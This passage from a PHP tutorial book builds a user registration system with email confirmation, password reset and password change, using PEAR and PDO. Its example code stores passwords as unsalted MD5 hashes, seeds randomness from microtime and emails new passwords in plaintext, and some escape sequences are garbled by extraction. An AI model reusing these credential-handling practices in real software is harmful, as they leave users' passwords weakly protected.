      $mime = new Mail_mime($crlf);
306   The PHP Anthology


           $mime->setHTMLBody($this->message);

           $mime->setTXTBody(strip_tags($this->message));

           $body = $mime->get();

           $hdrs = $mime->headers($hdrs);

           $mail = Mail::factory('mail');

           $succ = $mail->send($this->to, $hdrs, $body); 

           if (PEAR::isError($succ))

           {

             throw new SignUpEmailException('Error sending confirmation' .

                 ' email: ' .$succ->getDebugInfo());

           }

         }




      The sendConfirmation method will generate the content of the confirmation email,
      in HTML or text, by replacing the special text <confirm_url/> with the confirmation
      URL the user will need to click on to confirm the registration. The confirmation
      URL is generated using the $listener property, set by the class constructor method,
      and the unique code returned by the confirmCode method. sendConfirmation then
      uses an instance of the PEAR::Mail_mime class to create and send the email. If an
      error is generated with the sending of the email, another one of our custom excep­
      tions, SignUpEmailException, will be thrown. We’ll also use the getDebugInfo
      method of the PEAR_Error object to obtain some information about the error.

      Finally, the confirm method is used to examine confirmations via the URL sent in
      the email:

                                                                 Signup.class.php (excerpt)

         public function confirm($confirmCode)
         {
           $user_table = $this->cfg['users_table']['table'];
           $user_login = $this->cfg['users_table']['col_login'];
           $user_pass = $this->cfg['users_table']['col_password'];
           $user_email = $this->cfg['users_table']['col_email'];
           $user_first = $this->cfg['users_table']['col_name_first'];
           $user_last = $this->cfg['users_table']['col_name_last'];
           $user_sig = $this->cfg['users_table']['col_signature'];

            $sign_table = $this->cfg['signup_table']['table'];
            $sign_id = $this->cfg['signup_table']['col_id'];
            $sign_login = $this->cfg['signup_table']['col_login'];
Access Control      307


      $sign_pass = $this->cfg['signup_table']['col_password'];

      $sign_email = $this->cfg['signup_table']['col_email'];

      $sign_first = $this->cfg['signup_table']['col_name_first'];

      $sign_last = $this->cfg['signup_table']['col_name_last'];

      $sign_sig = $this->cfg['signup_table']['col_signature'];

      $sign_code = $this->cfg['signup_table']['col_code'];


      try

      {

        $sql = "SELECT * FROM " . $sign_table . "

              WHERE " . $sign_code . "=:confirmCode";

        $stmt = $this->db->prepare($sql);

        $stmt->bindParam(':confirmCode', $confirmCode);

        $stmt->execute();

        $row = $stmt->fetchAll();

      }

      catch (PDOException $e)

      {

          throw new SignUpDatabaseException('Database error when' .

              ' inserting user info: '.$e->getMessage());

      }




Again, we assign configuration settings to local variables to improve the script’s
readability. First, the confirm method selects from the signup table all records that
have a value in the confirm_code column that matches the $confirmCode value.

If the number of records returned is anything other than 1, a problem has occurred
and a SignUpConfirmationException exception is thrown:

                                                            Signup.class.php (excerpt)

      if (count($row) != 1) {
          throw new SignUpConfirmationException(count($row) .
              ' records found for confirmation code: ' .
              $confirmCode
          );
      }



If only one matching record is found, the method can continue to process the con­
firmation:
308   The PHP Anthology

                                                                  Signup.class.php (excerpt)

               try
               {
                 // Copy the data from Signup to User table
                 $sql = "INSERT INTO " . $user_table . " (
                     " . $user_login . ", " . $user_pass . ",
                     " . $user_email . ", " . $user_first . ",
                     " . $user_last . ", " . $user_sig . ") VALUES (
                     :login, :pass, :email, :firstname, :lastname, :sign )";
                 $stmt = $this->db->prepare($sql);
                 $stmt->bindParam(':login',$row[0][$sign_login]);
                 $stmt->bindParam(':pass',$row[0][$sign_pass]);
                 $stmt->bindParam(':email',$row[0][$sign_email]);
                 $stmt->bindParam(':firstname',$row[0][$sign_first]);
                 $stmt->bindParam(':lastname',$row[0][$sign_last]);
                 $stmt->bindParam(':sign',$row[0][$sign_sig]);
                 $stmt->execute();
                 $result = $stmt->fetch();
                 // Delete row from signup table
                 $sql = "DELETE FROM " . $sign_table . "
                     WHERE " . $sign_id . "= :id";
                 $stmt = $this->db->prepare($sql);
                 $stmt->bindParam(':id', $row[0][$sign_id]);
                 $stmt->execute();
               }
               catch (PDOException $e)
               {
                 throw new SignUpDatabaseException('Database error when' .
                     ' inserting user info: '.$e->getMessage());
               }
           }
       }



      If an account is successfully confirmed, the record is copied to the user table, and
      the old record is deleted from the signup table.

      Thus the confirmation process, the user’s registration, and our SignUp class, is
      complete!

      The Signup Page
      Now that our SignUp class is done, we need a web page from which to display the
      registration form and run the process.
Access Control     309

The first step is to include the classes we’ll use:

                                                                signup.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require_once 'SignUp.class.php';
 require_once 'HTML/QuickForm.php';
 require_once 'Mail.php';
 require_once 'Mail/mime.php';
 require 'dbcred.php';



First, because we’re using PEAR packages, which will cause E_Strict errors under
PHP 5, we set the error reporting level to E_ALL with the error_reporting function.

Of course, we need to include our SignUp class file. We’ll also be using the PEAR
HTML_Quickform and Mail_mime packages. The dbcred.php file contains the database
credentials we’ll need to connect to our database.

Next, we create the variables we need:

                                                                signup.php (excerpt)

 $reg_messages = array(
     'success' => array(
         'title' => 'Confirmation Successful',
         'content' => '<p>Thank you. Your account has now been' .
         ' confirmed.<br />You can now <a href="access.php">login' .
         '</a></p>'
     ),
     'confirm_error' => array(
         'title' => 'Confirmation Problem',
         'content' => '<p>There was a problem confirming your' .
         ' account.<br />Please try again or contact the site ' .
         'administrators</p>'
     ),
     'email_sent' => array(
         'title' => 'Check your email',
         'content' => '<p>Thank you. Please check your email to ' .
         'confirm your account</p>'
     ),
     'email_error' => array(
         'title' => 'Email Problem',
310   The PHP Anthology


                 'content' => '<p>Unable to send confirmation email.<br />' .

                 'Please contact the site administrators.</p>'

            ),

            'signup_not_unique' => array(

                'title' => 'Registration Problem',

                'content' => '<p>There was an error creating your' .

                ' account.<br />The desired username or email address has' .

                ' already been taken.</p>'

            ),

            'signup_error' => array(

                'title' => 'Registration Problem',

                'content' => '<p>There was an error creating your' .

                ' account.<br />Please contact the site administrators.' .

                '</p>'

            )

       );

       $listener = 'http://localhost/phpant2/chapter_10/examples/' .

           'signup.php';

       $frmName = 'Your Name';

       $frmAddress = 'noreply@yoursite.com';

       $subj = 'Account Confirmation';

       $msg = <<<EOD

       <html>

       <body>

       <h2>Thank you for registering!</h2>

       <div>The final step is to confirm 

       your account by clicking on:</div>

       <div><confirm_url/></div>

       <div>

       <b>Your Site Team</b>

       </div>

       </body>

       </html>

       EOD;




      The $reg_messages variable contains an array of page titles and messages that will
      be used in the web page, depending on the stage and status of the registration process.
      $listener, $frmName, $frmAddress, $subj, and $msg are required by our Signup
      class. If you have a look at the $msg variable, the body of our confirmation email,
      you’ll see the special <confirm_url/> code which will be replaced by the confirm­
      ation URL later in the process.
Access Control     311

The $listener variable stores the absolute URL of the script to which the confirm­
ation code should be submitted. It links to itself in our example script. This variable
is set to reflect the folder setup of our testing environment, so make sure you change
this variable to suit your own setup.

The next step is to set up our database connection and instantiate our SignUp object:

                                                                   signup.php (excerpt)

 try
 {
   // Instantiate the PDO object for the database connection
   $db = new PDO($dsn, $user, $password);
   $db->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);

   // Instantiate the signup class
   $signUp = new SignUp($db, $listener, $frmName,
       $frmAddress, $subj, $msg, TRUE);



Notice also that we’re opening a try block to catch any exceptions that may be
thrown from the execution of the rest of the code. Any exceptions caught after this
point—if the PDO connection fails for example—will display an appropriate message
on the web page, instead of showing a PHP error.

The next step is to check whether the page is being requested as part of a confirma­
tion—we’ll check for the presence of the $_GET['code'] variable:

                                                                   signup.php (excerpt)

   if (isset($_GET['code']))
   {
     try
     {
       $signUp->confirm($_GET['code']);
       $display = $reg_messages['success'];
     } catch (SignUpException $e){
       $display = $reg_messages['confirm_error'];
     }
   }
312   The PHP Anthology

      If the confirmation code is present, we call the SignUp->confirm method, supplying
      the code the page received. We then set the $display variable, which will contain
      the page title and message to display on our web page. If no exception was raised
      from the confirm method at this point in the script, we can assume all went well
      and set the $display variable to the success message. If, however, a
      SignUpException exception was thrown, we set the $display variable to the con­
      firmation_error message. You may remember that the SignUpException class was
      the base class for all our custom exceptions. By catching this class of exception,
      we’ll catch an instance of any of our custom exceptions.

      If the confirmation code is not present, we prepare to display the registration form:

                                                                       signup.php (excerpt)

         else
         {
           function cmpPass($element, $confirmPass)
           {
             $password = $GLOBALS['form']->getElementValue('password');
             return $password == $confirmPass;
           }
           function encryptValue($value)
           {
             return md5($value);
           }



      The above are helper functions that will be used by our HTML_Quickform object to
      validate and filter the registration form contents.

      The HTML_Quickform object makes it very easy to construct the form and the form
      validation:

                                                                       signup.php (excerpt)

            /* Make the form */
            // Instantiate the QuickForm class
            $form = new HTML_QuickForm('regForm', 'POST');

            // Register the compare function
            $form->registerRule('compare', 'function', 'cmpPass');
Access Control   313


// The login field

$form->addElement('text', 'login', 'Desired Username');

$form->addRule('login', 'Please provide a username',

    'required', FALSE, 'client');

$form->addRule('login',

    'Username must be at least 6 characters',

    'minlength', 6, 'client');

$form->addRule('login',

    'Username cannot be more than 50 characters', 'maxlength',

    50, 'client');

$form->addRule('login',

    'Username can only contain letters and numbers',

    'alphanumeric', NULL, 'client');


// The password field

$form->addElement('password', 'password', 'Password');

$form->addRule('password', 'Please provide a password',

    'required', FALSE, 'client');

$form->addRule('password',

    'Password must be at least 6 characters', 'minlength', 6,

    'client');

$form->addRule('password',

    'Password cannot be more than 12 characters', 'maxlength',

    12, 'client');

$form->addRule('password',

    'Password can only contain letters and numbers',

    'alphanumeric', NULL, 'client');


// The field for confirming the password

$form->addElement('password', 'confirmPass',

    'Confirm Password');

$form->addRule('confirmPass', 'Please confirm password',

    'required', FALSE, 'client');

$form->addRule('confirmPass', 'Passwords must match',

    'compare', 'function');


// The email field

$form->addElement('text', 'email', 'Email Address');

$form->addRule('email', 'Please enter an email address',

    'required', FALSE, 'client');

$form->addRule('email', 'Please enter a valid email address',

    'email', FALSE, 'client');

$form->addRule('email',

    'Email cannot be more than 50 characters',

    'maxlength', 50, 'client');
314   The PHP Anthology



            // The first name field

            $form->addElement('text', 'firstName', 'First Name');

            $form->addRule('firstName', 'Please enter your first name',

                'required', FALSE, 'client');

            $form->addRule('firstName',

                'First name cannot be more than 50 characters', 'maxlength',

                50, 'client');


            // The last name field

            $form->addElement('text', 'lastName', 'Last Name');

            $form->addRule('lastName', 'Please enter your last name',

                'required', FALSE, 'client');

            $form->addRule('lastName',

                'Last name cannot be more than 50 characters', 'maxlength',

                50, 'client');


            // The signature field

            $form->addElement('textarea', 'signature', 'Signature');


            // Add a submit button called submit 

            // and "Send" as the button text

            $form->addElement('submit', 'submit', 'Register');

            /* End making the form */




      After we’ve defined the registration form, we use the HTML_Quickform->validate
      method to check that the form has been submitted and that it validates. If it does
      validate, we can proceed to build the array of form data our SignUp object needs to
      create a new signup record:

                                                                      signup.php (excerpt)

            if ($form->validate())
            {
              // Apply the encryption filter to the password
              $form->applyFilter('password', 'encryptValue');

              // Build an array from the submitted form values
              $submitVars = array(
                  'login' => $form->getSubmitValue('login'),
                  'password' => $form->getSubmitValue('password'),
                  'email' => $form->getSubmitValue('email'),
                  'firstName' => $form->getSubmitValue('firstName'),
Access Control     315


                'lastName' => $form->getSubmitValue('lastName'),

                'signature' => $form->getSubmitValue('signature')

          );




Since we’re using HTML_Quickform, any slashes added by magic quotes are automat­
ically removed from the submitted values; when you’re not using HTML_Quickform,
be sure to strip out the slashes if magic_quotes is enabled.

Next, we call the create the signup record and send the confirmation email. We
want to wrap this in a try block in order to catch any possible exceptions:

                                                                  signup.php (excerpt)

          try
          {
            $signUp->createSignup($submitVars);
            $signUp->sendConfirmation();
            $display = $reg_messages['email_sent'];
          }
          catch (SignUpEmailException $e)
          {
            $display = $reg_messages['email_error'];
          }
          catch (SignUpNotUniqueException $e)
          {
            $display = $reg_messages['signup_not_unique'];
          }
          catch (SignUpException $e)
          {
            $display = $reg_messages['signup_error'];
          }
      }



If no exceptions are thrown, we can set $display to an appropriate message that
informs the user to expect the email. If exceptions are thrown, we can set $display
to a message that’s appropriate for each one, thanks to our defining of several custom
exception classes.

If the form hasn’t been submitted yet, it’ll need to be shown to the user; we set
$display to include the form HTML source:
316   The PHP Anthology

                                                                         signup.php (excerpt)

               else
               {
                 // If not submitted, display the form
                 $display = array(
                     'title' => 'New Registration',
                     'content' => $form->toHtml()
                 );
               }
           }
       }



      We’ve reached the end of the first try block, so we need to catch any remaining ex­
      ception that may be thrown. If an exception is caught here, it won’t be one of our
      custom exceptions. Therefore, we need to make sure that the exception details are
      logged using the error_log function, and that the web page displays an appropriate
      message to inform the user that registration cannot be completed:

                                                                         signup.php (excerpt)

       catch (Exception $e)
       {
         error_log('Error in '.$e->getFile().
             ' Line: '.$e->getLine().
             ' Error: '.$e->getMessage()
         );
         $display = $reg_messages['signup_error'];
       }
       ?>



      Now, the only task left to do is to produce the HTML source for the web page. Our
      $display variable has been set to an array value containing two elements—one for
      the page title and one for the page contents. This setting will display the registration
      form and a confirmation message, or an error message if something has gone wrong.
      These displays are inserted into the source code where appropriate:
Access Control     317

                                                                        signup.php (excerpt)

 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     ⋮ HTML Head contents…
   </head>
   <body>
     <h1><?php echo $display['title']; ?></h1>
     <?php echo $display['content']; ?>
   </body>
 </html>



The finished registration form should look like the one shown in Figure 10.3.




                          Figure 10.3. The finished registration form


And there we have it—a simple but fully functioning user registration system with
email confirmation facility!
318   The PHP Anthology


      Discussion
      So that you don’t grow bored, I’ve left a couple of pieces of the jigsaw puzzle for
      you to fill in yourself. If a registered user exists who has the same username or email
      address as the one entered by the new registrant, the createSignup method throws
      an exception and the procedure is halted. If you’re happy using HTML_QuickForm,
      you might want to split this check into a separate method that HTML_QuickForm can
      apply as a validation rule for each field in the form. This approach should reduce
      frustration when users find that the account name they chose already ex­
      ists—HTML_QuickForm will generate a message to inform them of this fact, preserve
      the rest of the values they entered, and allow them to try again with a different
      username.

      If you plan to let users change their email addresses once their accounts are created,
      you’ll also need to confirm the new addresses before you store them in the user
      table. You should be able to reuse the methods provided by the SignUp class for
      this purpose. You might even consider reusing the signup table to handle this task.
      Some modifications will be required—you’ll want the confirm method to be able
      to update an existing record in the user table, for example. Be very careful that you
      don’t create a hole in your security, though. If you’re not checking for existing records
      in the user table, a user could sign up for a new account with details that match an
      existing row in the user table. You’ll then end up changing the email address of an
      existing user to that of a new user, which will cause you some embarrassment, at
      the very least.


      How do I deal with members
      who forget their passwords?
      Unfortunately, humans have a tendency to forget important information such as
      passwords, so a feature that allows users to retrieve forgotten passwords is an essen­
      tial time saver. Overlook this necessity, and you can expect to waste a lot of time
      manually changing passwords for people who have forgotten them.

      If you encrypt the passwords in your database, you’ll need a mechanism to generate
      a new password that, preferably, is easy to remember.
Access Control       319


       Be Careful with Password Hints
      A common tactic used in web site registration is to use simple questions as memory
      joggers should users forget their password. These questions can include “Where
      were you born?” and “What’s your pet’s name?” Yet details like this may well be
      common knowledge or easy for other users to guess.


Solution
Since we already have a valid email address for each account, as confirmed through
our signup procedure in “How do I build a registration system?”, we just need to
send the new password to that address. Our solution uses the user table from the
previous sections:

                                                                 access_control.sql (excerpt)

 CREATE TABLE user (
   user_id     INT(11)      NOT NULL AUTO_INCREMENT,
   login       VARCHAR(50) NOT NULL DEFAULT '',
   password    VARCHAR(50) NOT NULL DEFAULT '',
   email       VARCHAR(50) DEFAULT NULL,
   firstName   VARCHAR(50) DEFAULT NULL,
   lastName    VARCHAR(50) DEFAULT NULL,
   signature   TEXT         NOT NULL,
   PRIMARY KEY (user_id),
   UNIQUE KEY user_login (login)
 );



The AccountMaintenance Class
The AccountMaintenance class is a utility class that, among other things, will reset
the password for a user’s account and generate an email to send the user the new
password. Our class uses the following configuration settings:

                                                                 access_control.ini (excerpt)

 ; Access Control Settings

 ;web form variables e.g. $_POST['login']
 [login_vars]
 login=login
320   The PHP Anthology


       ;user login table details

       [users_table]

       table=user

       col_id=user_id

       col_login=login

       col_password=password

       col_email=email

       col_name_first=firstName

       col_name_last=lastName




      To provide a consistent level of error handling, we define some custom exception
      classes:

                                                     AccountMaintenance.class.php (excerpt)

       class AccountException extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log('Error in '.$this->getFile().
             ' Line: '.$this->getLine().
             ' Error: '.$this->getMessage()
           );
         }
       }
       class AccountDatabaseException extends AccountException {}
       class AccountUnknownException extends AccountException {}
       class AccountPasswordException extends AccountException {}
       class AccountPasswordResetException extends AccountException {}



      Our base class, AccountException, is a custom exception that ensures the exception
      details are logged using the error_log function. The subclasses represent different
      exception situations that might arise during account maintenance.

      We begin our AccountMaintenance class definition with the class properties:
Access Control     321

                                                AccountMaintenance.class.php (excerpt)

 class AccountMaintenance
 {
   protected $db;
   protected $cfg;
   private $words;



$db will contain a PDO instance for our database connection, $cfg will store our
configuration details, and $words will store the path to the random words file that’s
used in password generation.

The constructor simply stores the database object for future use by the class and
loads the configuration file:

                                                AccountMaintenance.class.php (excerpt)

   public function __construct(PDO $db)
   {
     $this->db = $db;
     $this->cfg = parse_ini_file('access_control.ini', TRUE);
   }



Since we save the user’s password in the database as an MD5 hash (a form of one-
way encryption), we can no longer find out what the original password was. If
members forget their passwords in such cases, you’ll have to make new ones for
them. You could simply generate a random string of characters, but it’s important
to remember that if you make your security systems too unfriendly, you’ll put off
legitimate users. The resetPassword method generates a more human-friendly
randomized password:

                                                AccountMaintenance.class.php (excerpt)

   function resetPassword($login, $email)
   {
     //Put the cfg vars into local vars for readability
     $user_table = $this->cfg['users_table']['table'];
     $user_id = $this->cfg['users_table']['col_id'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_pass = $this->cfg['users_table']['col_password'];
     $user_email = $this->cfg['users_table']['col_email'];
322   The PHP Anthology


            $user_first = $this->cfg['users_table']['col_name_first'];

            $user_last = $this->cfg['users_table']['col_name_last'];

            $user_sig = $this->cfg['users_table']['col_signature'];


            try

            {

              $sql = "SELECT " . $user_id . ",

                  " . $user_login . ", " . $user_pass . ",

                  " . $user_first . ", " . $user_last . "

                  FROM

                  " . $user_table . "

                  WHERE

                  " . $user_login . "=:login

                  AND

                  " . $user_email . "=:email";

              $stmt = $this->db->prepare($sql);

              $stmt->bindParam(':login', $login);

              $stmt->bindParam(':email', $email);

              $stmt->execute();

              $row = $stmt->fetchAll(PDO::FETCH_ASSOC);

            }

            catch (PDOException $e)

            {

              throw new AccountDatabaseException('Database error when' .

                  ' finding user: '.$e->getMessage());

            }




      First, we assign the configuration settings to local variables to make the code a little
      more readable. Next, we deal with the resetPassword method, which, when given
      a combination of a username and an email address, attempts to identify the corres­
      ponding row in the user table.

      We use both the username and email to identify the row, so it’s a little more difficult
      for other people to reset your members’ passwords. Although there’s no risk of in­
      dividuals stealing the new password (unless they have control over a member’s
      email account), it will certainly irritate people if their passwords are continually
      being reset. Requiring both the username and email address of the user makes the
      process a little more complex.

      If we can’t find a single matching row, we throw an exception:
Access Control     323

                                                AccountMaintenance.class.php (excerpt)

      if (count($row) != 1)
      {
        throw new AccountUnknownException('Could not find account');
      }



Next, we call the generatePassword method (which we’ll discuss in a moment) to
create a new password:

                                                AccountMaintenance.class.php (excerpt)

      try
      {
        $password = $this->generatePassword();



This method call is placed within a try block to catch the exception thrown by
generatePassword if a new password cannot be generated.

generatePassword then updates the user table with the new password (using md5
to encrypt it), and returns the new password in an array containing the user details:

                                                AccountMaintenance.class.php (excerpt)

        $sql = "UPDATE " . $user_table . "
            SET
            " . $user_pass . "=:pass
            WHERE
            " . $user_id . "=:id";
        $stmt = $this->db->prepare($sql);
        $stmt->bindParam(':pass',md5($password));
        $stmt->bindParam(':id', $row[0][$user_id]);
        $stmt->execute();
      }
      catch (AccountPasswordException $e)
      {
        throw new AccountResetPasswordException('Error when' .
            ' generating password: '.$e->getMessage());
      }
      catch (PDOException $e)
      {
        throw new AccountDatabaseException('Database error when' .
324   The PHP Anthology


                 ' resetting password: '.$e->getMessage()); 

           }

           $row[0][$user_pass] = $password;

           return $row;

         }




      The addWords method is used to supply the class with an indexed array of words
      with which to build memorable passwords:

                                                       AccountMaintenance.class.php (excerpt)

         function addWords($words)
         {
           $this->words = $words;
         }



      I’ve used a list of over one thousand words, stored in a text file, to build memorable
      passwords. Be aware that if anyone knows the list of words you’re using, cracking
      the new password will be significantly easier, so you should create your own list.

      generatePassword constructs a random password from the
      AccountMaintenance->words array, adding separators that can include any number
      from 0 to 9, or an underscore character:

                                                       AccountMaintenance.class.php (excerpt)

         protected function generatePassword()
         {
           $count = count($this->words);
           if ($count == 0)
           {
             throw new AccountPasswordException('No words to use!');
           }
           mt_srand((double)microtime() * 1000000);
           $seperators = range(0,9);
           $seperators[] = '_';
           $password = array();
           for ($i = 0; $i < 4; $i++) {
             if ($i % 2 == 0) {
               shuffle($this->words);
               $password[$i] = trim($this->words[0]);
Access Control     325


       } else {

         shuffle($seperators);

         $password[$i] = $seperators[0];

       }

     }

     shuffle($password);

     return implode('', $password);

   }

 }




The password itself will contain two words chosen at random from the list, as well
as two random separators. The order in which these elements appear in the password
is also random. The passwords this system generates might look something like
7correct9computer and 48courtclothes, which follow a format that’s relatively easy
for users to remember.

The Reset Password Page
There’s one thing we need to finish our web site’s account maintenance feature: we
need a web form that our users can fill in to request a password change or reset.
First, we include all the packages we need:

                                                               newpass.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require_once 'Session.class.php';
 require_once 'AccountMaintenance.class.php';
 require_once 'HTML/QuickForm.php';
 require_once 'Mail.php';
 require_once 'Mail/mime.php';
 require_once 'dbcred.php';



We then set the error reporting level to E_ALL with the error_reporting function,
since we’re using PEAR packages that will cause E_Strict errors under PHP 5.

Of course, we need to include our AccountMaintenance class file. We’ll also be using
the PEAR HTML_Quickform and Mail_mime packages. The dbcred.php file contains
the database credentials we’ll need to connect to our database.

Next, we create the variables we need:
326   The PHP Anthology

                                                                   newpass.php (excerpt)

       $reg_messages = array(
           'email_sent' => array(
               'title' => 'Check your email',
               'content' => '<p>Thank you. An email has been sent to:</p>'
           ),
           'email_error' => array(
               'title' => 'Email Problem',
               'content' => '<p>Unable to send your details.<br />' .
               'Please contact the site administrators.</p>'
           ),
           'no_account' => array(
               'title' => 'Account Problem',
               'content' => '<p>We could not find your account.<br />' .
               'Please contact the site administrators.</p>'
           ),
           'reset_error' => array(
               'title' => 'Password Reset Problem',
               'content' => '<p>There was an error resetting your' .
               ' password.<br />Please contact the site administrators.' .
               '</p>'
           )
       );
       $yourEmail = 'you@yourdomain.com';
       $subject = 'Your password';
       $msg = 'Here are your login details. Please change your password.';



      The $reg_messages variable contains an array of page titles and messages that will
      be used in the web page at various stages of the registration process. $yourEmail,
      $subject, and $msg are used in the creation of the email notification.

      Next, we build our form with PEAR::HTML_Quickform:

                                                                   newpass.php (excerpt)

       try
       {
         // Instantiate the QuickForm class
         $form = new HTML_QuickForm('passwordForm', 'POST');

         // Add a header to the form
         $form->addElement('header', 'MyHeader',
            'Forgotten Your Password?');
Access Control     327



   // Add a field for the email address

   $form->addElement('text', 'email', 'Enter your email address');

   $form->addRule('email', 'Enter your email', 'required', FALSE,

       'client');

   $form->addRule('email', 'Enter a valid email address', 'email',

       FALSE, 'client');

   // Add a field for the login

   $form->addElement('text', 'login', 'Enter your login name');

   $form->addRule('login', 'Enter your login', 'required', FALSE,

       'client'); 


   // Add a submit button called submit with label "Send"

   $form->addElement('submit', 'submit', 'Get Password'); 




Notice also that we’re opening a try block: we want to catch any exceptions that
may be thrown from the execution of the rest of the code. This precaution will allow
us to display an appropriate message on the web page instead of a PHP error.

If the form has been submitted, we can begin the password changing process:

                                                               newpass.php (excerpt)

   if ($form->validate())
   {
     $db = new PDO($dsn, $user, $password);
     $db->setAttribute(PDO::ATTR_ERRMODE,
         PDO::ERRMODE_EXCEPTION);
     $aMaint = new AccountMaintenance($db);
     $rawWords = file('words.txt');
     $word = array_map('trim', $rawWords);
     $aMaint->addWords($word);



We instantiate the PDO and AccountMaintenance classes and load our words file (I
also trimmed off any whitespace that may appear before or after each word—just
in case) so we can pass it to the addWords method.

Next, we call the resetPassword method, passing the login and email values from
the form as arguments:
328   The PHP Anthology

                                                                     newpass.php (excerpt)

             $details = $aMaint->resetPassword(
                 $form->getSubmitValue('login'),
                 $form->getSubmitValue('email'));



      If all goes well, an email is sent via PEAR::Mail_Mime to inform the user of the new
      password:

                                                                     newpass.php (excerpt)

             $crlf = "n";
             $text = $msg . "nnLogin: " . $details[0]['login'] .
                 "nPassword: " . $details[0]['password'];

             $hdrs = array(
                 'From'        => $yourEmail,
                 'Subject'     => $subject
             );

             $mime = new Mail_mime($crlf);
             $mime->setTXTBody($text);
             $body = $mime->get();
             $hdrs = $mime->headers($hdrs);
             $mail = Mail::factory('mail');
             // Send the message
             $succ = $mail->send($form->getSubmitValue('email'), $hdrs,
                 $body);
             if (PEAR::isError($succ))
             {
               $display = $reg_messages['email_error'];
             }
             else
             {
               $display = $reg_messages['email_sent'];
               $display['content'] .= '<p>' .
                   $form->getSubmitValue('email') . '</p>';
             }
         }



      The page $display variable is set to a helpful message when the email is sent suc­
      cessfully; if it’s not, the $display variable displays an error message.
Access Control     329

If the form hasn’t yet been submitted, we just display the form HTML:

                                                             newpass.php (excerpt)

     else
     {
       $display = array(
           'title' => 'Reset Password',
           'content' => $form->toHtml()
       );
     }
 }



Finally, we catch any exceptions that may have occurred and display an appropriate
message:

                                                             newpass.php (excerpt)

 catch (AccountUnknownException $e)
 {
   $display = $reg_messages['no_account'];
 }
 catch (Exception $e)
 {
   error_log('Error in '.$e->getFile().
       ' Line: '.$e->getLine().
       ' Error: '.$e->getMessage()
   );
   $display = $reg_messages['reset_error'];
 }
 ?>



The HTML of the Reset Password page looks like this:

                                                             newpass.php (excerpt)

 <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     ⋮ HTML Head contents…
   </head>
   <body>
330   The PHP Anthology


           <h1><?php echo $display['title']; ?></h1>

           <?php echo $display['content']; ?>

         </body>

       </html>




      Figure 10.4 shows the page’s display.




                                   Figure 10.4. The Reset Password page


      You can add a link to the bottom of your login form so that the user is able to access
      the Reset Password page. Here’s an example:

       <a href="newpass.php">Forgotten your password?</a>




      How do I let users change their passwords?
      A good design test for many PHP applications is whether users can change their
      passwords without needing to log back into the application afterwards. Provided
      you construct your application carefully, your users should be able to go about their
      business without further ado after changing their passwords. It’s important to be
      considerate to your site’s users if you want them to stick around!
Access Control     331


Solution
If we return for a minute to the session-based authentication mechanism we dis­
cussed earlier in this chapter, you’ll remember that the login and md5 encrypted
password are stored in session variables and rechecked on every new page by the
Auth class. The trick is to change the value of the password in both the session
variable and the database when users change their passwords. We can perform this
trick with a small modification to the AccountMaintenance class—found in “How
do I deal with members who forget their passwords?”—and the addition of a new
form.

Modifying AccountMaintenance
With a little tweaking of the AccountMaintenance class to add a method for changing
passwords, we should be able to handle the job fairly easily. The changePassword
method requires an instance of the Auth class (found in “How do I create a class to
control access to a section of the site?”), the old password, and the new password
as arguments:

                                                AccountMaintenance.class.php (excerpt)

   public function changePassword($auth, $oldPassword, $newPassword)
   {
     $var_login = $this->cfg['login_vars']['login'];
     $user_table = $this->cfg['users_table']['table'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_pass = $this->cfg['users_table']['col_password'];



At the beginning of the method, we store some of the configuration settings in local
variables to help the readability of the rest of the method.

The method then instantiates a new Session object (which we saw in “How do I
create a session class?”) and attempts to find the user record in the database:

                                                AccountMaintenance.class.php (excerpt)

      $session = new Session();
      try
      {
        $sql = "SELECT *
            FROM " . $user_table . "
332   The PHP Anthology


                 WHERE

                 " . $user_login . " = :login

                 AND

                 " . $user_pass . " = :pass";

             $stmt = $this->db->prepare($sql);

             $stmt->bindParam(':login', $session->get($var_login));

             $stmt->bindParam(':pass', md5($oldPassword));

             $stmt->execute();

             $result = $stmt->fetchAll(PDO::FETCH_ASSOC);

           }

           catch (PDOException $e)

           {

             throw new AccountDatabaseException('Database error when' .

                 ' finding user: '.$e->getMessage()); 

           }




      The method first performs a database lookup to find the record of the user who’s
      using the current login details—obtained from the session information—and the
      old password. If a PDOException is thrown, the method throws one of our custom
      exceptions, AccountDatabaseException.

      The results of the database lookup are checked—if anything but a single matching
      record is returned, the method will thrown an AccountUnknownException:

                                                    AccountMaintenance.class.php (excerpt)

           if (count($result) != 1)
           {
             throw new AccountUnknownException('Could not find account');
           }



      Finally, if no exceptions have been thrown, the method updates the password in­
      formation in the database with the new password:

                                                    AccountMaintenance.class.php (excerpt)

           try
           {
             $sql = "UPDATE " . $user_table . "
                 SET
                 " . $user_pass . " = :pass
Access Control     333


           WHERE

           " . $user_login . " = :login";

       $stmt = $this->db->prepare($sql);

       $stmt->bindParam(':login', $session->get($var_login));

       $stmt->bindParam(':pass', md5($newPassword));

       $stmt->execute();

       $auth->storeAuth($session->get($var_login),

         $newPassword);

     }

     catch (PDOException $e)

     {

       throw new AccountDatabaseException('Database error when' .

           ' updating password: '.$e->getMessage()); 

     }

   }




After we update the information in the user table, the current session information
is also updated via the Auth->storeAuth method. Again, if the operation throws a
PDOException, we throw an AccountDatabaseException.

It’s a good idea to ask the user to enter the old password before changing it over and
giving them access with a new one. Perhaps the user logged in at an Internet café
and then left, forgetting to log out, or worse, his or her session was hijacked elec­
tronically. The process of ascertaining that the user can provide the old password
can preclude some of the potential for damage, as it prevents anyone who “takes
over” the session from being able to change the password and thus assume total
control. Instead, the newcomer’s only logged in as long as the session continues.
(You may also wish to ask a user to reenter the password before completing any
major actions—like making a credit card purchase—for this very reason.)

The Change Password Form
This web page form will show you how the changePassword method can easily be
used in your registration system. We start by including all the classes and other
files we’ll need:

